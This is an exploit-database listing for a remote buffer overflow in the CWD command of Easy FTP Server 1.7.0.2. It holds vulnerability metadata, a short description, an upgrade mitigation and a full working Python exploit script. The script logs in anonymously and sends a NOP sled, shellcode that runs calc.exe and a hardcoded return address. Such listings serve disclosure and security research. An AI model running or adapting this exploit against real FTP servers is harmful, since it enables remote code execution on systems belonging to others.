Easy FTP Server 1.7.0.2 Remote BoF

vendor:

Easy FTP Server

by:

athleet

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy FTP Server

Affected Version From: 1.7.0.2

Affected Version To: 1.7.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:easyftpserver:easy_ftp_server:1.7.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 (Eng)

2009

Easy FTP Server 1.7.0.2 Remote BoF

Easy FTP Server 1.7.0.2 is vulnerable to a buffer overflow attack. The vulnerability exists in the CWD command, which allows an attacker to send a malicious payload of 272 bytes. The payload contains a NOP sled followed by a shellcode and a return address. The shellcode executes calc.exe on the target machine. The vulnerability was discovered by athleet and was tested on Windows XP SP3 (Eng).

Mitigation:

Upgrade to the latest version of Easy FTP Server.

Source

Exploit-DB raw data:

# Tested on: XP SP3 (Eng)
#!/usr/bin/python
import socket, sys

print """
*************************************************
*	Easy FTP Server 1.7.0.2 Remote BoF	*
*	    Discovered by: athleet	 		*
*	jonbutler88[at]googlemail[dot]com	*
*************************************************
"""

if len(sys.argv) != 3:
	print "Usage: ./easyftp.py <Target IP> <Port>"
	sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
shellcode = (
"\xba\x20\xf0\xfd\x7f" # 			MOV EDX,7FFDF020
"\xc7\x02\x4c\xaa\xf8\x77" # 		MOV DWORD PTR DS:[EDX],77F8AA4C
"\x33\xC0" # 						XOR EAX,EAX
"\x50" # 							PUSH EAX
"\x68\x63\x61\x6C\x63" #			PUSH 636C6163
"\x54" #							PUSH ESP
"\x5B" #							POP EBX
"\x50" #							PUSH EAX
"\x53" #							PUSH EBX
"\xB9\xC7\x93\xC2\x77" #			MOV ECX,77C293C7
"\xFF\xD1" #						CALL ECX
"\xEB\xF7" #						JMP SHORT 009AFE5B
)

nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	connect=s.connect((target, port))
	print "[+] Connected!"
except:
	print "[!] Connection failed!"
	sys.exit(0)
s.recv(1024) 
s.send('USER anonymous\r\n') 
s.recv(1024) 
s.send('PASS anonymous\r\n') 
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n') 
try:
	s.recv(1024)
	print "[!] Exploit failed..."
except:
	print "[+] Exploited ^_^"